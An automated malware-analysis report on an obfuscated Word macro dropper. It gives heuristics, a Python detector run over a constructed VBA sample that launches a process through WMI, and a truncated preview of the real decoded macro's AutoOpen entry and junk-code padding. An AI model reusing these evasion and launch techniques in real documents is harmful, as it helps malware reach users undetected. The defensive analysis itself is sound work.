Verdict: MALICIOUS (Risk Score 302)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1137.001 Office Application Startup: Office Template Macros
- T1071.001 Application Layer Protocol: Web Protocols
This OLE (Word binary format) document contains VBA macros, including an AutoOpen entry point, the standard technique for running code as soon as the document is opened. The critical heuristic OLE_VBA_WMI_PROCESS_CREATE indicates the macro builds a WMI moniker for Win32_Process and calls .Create to start a command, and OLE_VBA_SPLIT_KEYWORD_OBFUSCATION shows that the 'winmgmts:' moniker and related names are assembled from short string fragments so that no single literal trips a keyword scan. The ClamAV signature Doc.Dropper.Agent-6966352-0 classifies the file as a dropper. The decoded macro preview below shows the obfuscation style: the entry point is written as 'Sub _' with 'autoopen()' on the continuation line, which defeats a naive 'Sub autoopen' match; the real work is dispatched through 'Call P255599'; and the code is padded with While/Select Case blocks of Log, Cos and CStr calls whose loop conditions are undeclared (Empty) variables, so they never execute. The intent is to execute a payload through WMI process creation. No payload URL was recovered: the only extracted URL is the standard OOXML DrawingML schema namespace found in the document body, which is not an indicator, and the command string handed to .Create lies outside the shown preview. Note also that the medium-severity legacy WordBasic marker heuristic states that no modern VBA project was recovered, which is contradicted by the 43,022-byte VBA project that olevba decoded; treat that finding as redundant with OLE_VBA_AUTOOPEN rather than as separate evidence.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6966352-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Agent-6966352-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE). VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION). VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). AutoOpen macro present.
- GetObject call (high, OLE_VBA_GETOBJ). GetObject call present.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
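To make the two critical macro heuristics above concrete, here is an added example (not the analyzer's or oletools' own code) that reimplements OLE_VBA_SPLIT_KEYWORD_OBFUSCATION, OLE_VBA_WMI_PROCESS_CREATE and OLE_VBA_AUTOOPEN over a constructed VBA snippet. The snippet, its identifiers and the keyword list are assumptions for illustration and are not the extracted macros.bas. The example also joins VBA line continuations before matching the entry point, because the macro listing below writes it as 'Sub _' with 'autoopen()' on the next line, which a naive 'Sub autoopen' match misses.

```python
"""Added example, not the analyzer's or oletools' own code: a minimal
re-implementation of the macro heuristics listed above, run over a constructed
VBA snippet that mimics the evasion style of the extracted macro."""
import re

# Constructed sample for illustration; it is NOT the extracted macros.bas.
# It reproduces two tricks from the listing: 'Sub _' with the entry-point name
# on a continuation line, and a dangerous name split across string literals.
SAMPLE_VBA = '''
Sub _
autoopen()
    On Error Resume Next
    Dim m As String
    m = "win" & "mgm" & "ts:" & "Win32" & "_Pro" & "cess"
    Set proc = GetObject(m)
    proc.Create "cmd /c echo demo", Null, Null, pid
End Sub
'''

# Keyword list assumed for the example (the heuristic text names some of these).
DANGEROUS = ["winmgmts:", "win32_process", "scripting.filesystemobject",
             "wscript.shell", "powershell", "urldownloadtofile"]

LITERAL = re.compile(r'"([^"\n]*)"')
# A run of two or more literals joined with & or + on one line.
CHAIN = re.compile(r'"[^"\n]*"(?:[ \t]*[&+][ \t]*"[^"\n]*")+')
AUTOEXEC = re.compile(
    r"(?im)^[ \t]*(?:public[ \t]+|private[ \t]+)?sub[ \t]+"
    r"(auto_?open|document_open|autoexec|autoclose|document_close)\b")


def join_continuations(src: str) -> str:
    """Fold VBA ' _' + newline continuations so 'Sub _' / 'autoopen()' reads 'Sub autoopen()'."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


def naive_autoexec(src: str) -> bool:
    """Keyword scan on the raw text; misses the continuation-split entry point."""
    return AUTOEXEC.search(src) is not None


def autoexec_entrypoints(src: str) -> list:
    """OLE_VBA_AUTOOPEN: entry points found after continuations are joined."""
    return AUTOEXEC.findall(join_continuations(src))


def reassembled_literals(src: str) -> list:
    """Every concatenation chain as (joined_text, piece_count)."""
    chains = []
    for m in CHAIN.finditer(src):
        pieces = LITERAL.findall(m.group(0))
        chains.append(("".join(pieces), len(pieces)))
    return chains


def naive_keyword_hits(src: str) -> list:
    """Dangerous names present verbatim in the raw text (what split literals evade)."""
    low = src.lower()
    return [kw for kw in DANGEROUS if kw in low]


def split_keyword_obfuscation(src: str) -> list:
    """OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: a dangerous name that exists only after
    joining two or more literals and appears in no single literal."""
    singles = [s.lower() for s in LITERAL.findall(src)]
    hits = set()
    for joined, count in reassembled_literals(src):
        if count < 2:
            continue
        for kw in DANGEROUS:
            if kw in joined.lower() and not any(kw in s for s in singles):
                hits.add(kw)
    return sorted(hits)


def wmi_process_create(src: str) -> bool:
    """OLE_VBA_WMI_PROCESS_CREATE: winmgmts moniker + Win32_Process + a .Create call,
    evaluated over the raw text plus every reassembled literal."""
    joined = "\n".join(j.lower() for j, _ in reassembled_literals(src))
    flat = src.lower() + "\n" + joined
    return ("winmgmts:" in flat and "win32_process" in flat
            and re.search(r"\.create\b", flat) is not None)


def scan(src: str) -> dict:
    """Run the heuristics and return finding id -> evidence."""
    return {
        "OLE_VBA_AUTOOPEN": autoexec_entrypoints(src),
        "OLE_VBA_SPLIT_KEYWORD_OBFUSCATION": split_keyword_obfuscation(src),
        "OLE_VBA_WMI_PROCESS_CREATE": wmi_process_create(src),
    }


if __name__ == "__main__":
    print("naive autoexec match:", naive_autoexec(SAMPLE_VBA))
    print("naive keyword hits:", naive_keyword_hits(SAMPLE_VBA))
    for finding, evidence in scan(SAMPLE_VBA).items():
        print(finding, evidence)
```

On the constructed sample the naive checks find nothing, while the reassembling scan reports the split 'winmgmts:' and 'Win32_Process' names, the .Create chain and the autoopen entry point. A name that already sits whole in one literal is deliberately not reported by split_keyword_obfuscation, matching the heuristic's "appears in no single literal" condition.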
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43022 bytes | 0f9d0799acb3948e55e7fa1057fea3efb63aa7be4cdf4e530160904ca858e1ea |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "B6108955"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "F15429"
Attribute VB_Base = "0{F7AEC335-83AB-407F-BE00-CC619A70DC49}{CD4CF7E8-CE66-4EF7-A1BA-E559BB585E7E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F3_952"
Attribute VB_Name = "J0536822"
Attribute VB_Name = "N7788748"
Attribute VB_Name = "Z27_83"
Attribute VB_Name = "s9203027"
Attribute VB_Name = "b52_6831"
Attribute VB_Name = "Q825387"
Attribute VB_Name = "i3_6595"
Attribute VB_Name = "q6_83_"
Attribute VB_Base = "0{31E9B1DF-5E8A-4D2E-93FE-DC6493918584}{366CD540-B076-4538-AC65-03CCE723149F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j21_30"
Function c81166_(o30396)
While G7229771 And O137677
Select Case w8_162_8
Case n64__341
B3680669 = Log(c435613)
z0_6250 = 980366862
T36910 = Int(N3_823 + CLng(U406_19))
Case u2943_65
H17279 = L8488901
d45520 = Cos(153269693)
q1463827 = CStr(330858079)
End Select
Wend
While B128743 And B_071_50
Select Case E60910
Case d1313459
G9184_ = Log(G6461_09)
I319678_ = 642431198
f2483993 = Int(t62976 + CLng(P26357_2))
Case b_5443
z902268 = n_1017
q359981 = Cos(478042632)
W9630337 = CStr(251490308)
End Select
Wend
Set c81166_ = CVar(o30396)
While b8359_1 And k9469816
Select Case J939291
Case l95266
f0441981 = Log(G752_062)
v18899 = 808506213
d910_5 = Int(O2_791 + CLng(j9707758))
Case d2863_89
F86848 = u8218021
n_5532 = Cos(884622483)
m0_0_6_ = CStr(781093032)
End Select
Wend
While G54560 And l0349_
Select Case P24017
Case f542841_
V860278 = Log(N_1716)
N77166 = 354024360
c66504 = Int(d875183 + CLng(i_60474))
Case T04_2221
O85833 = o03059_0
M3_242 = Cos(938899852)
i763_8 = CStr(59754062)
End Select
Wend
While o0492618 And a4_218
Select Case z69525
Case I861905
j892_4 = Log(I2_4097_)
Z_580274 = 375098906
V8021514 = Int(K65138 + CLng(s_16__))
Case z9877_2
a2395683 = a18765
M8_8_45 = Cos(394165218)
Y644239 = CStr(594074891)
End Select
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While r6_73526 And P429_88
Select Case a17584
Case F_73156_
W833845 = Log(W887_5)
s41347 = 666925634
h530895 = Int(N_4431 + CLng(G15470))
Case f86522
H8_139 = d821_71
F6873173 = Cos(739516046)
t82251 = CStr(162195872)
End Select
Wend
While r98693 And U9448252
Select Case Q16756_
Case A055252
n75416 = Log(w35410)
K68342 = 615491629
c1143065 = Int(P2__103 + CLng(M1__240))
Case Y_7_366
o840__6_ = a8417_
j2_14___ = Cos(211022618)
u56636 = CStr(859381382)
End Select
Wend
Call P255599
While c4646973 And S9964348
Select Case u803799
Case o52490
d6_29_7 = Log(A7371070)
V4881110 = 278893779
B7_7933 = Int(i38992 + CLng(o7658__))
Case o028
```
... (truncated)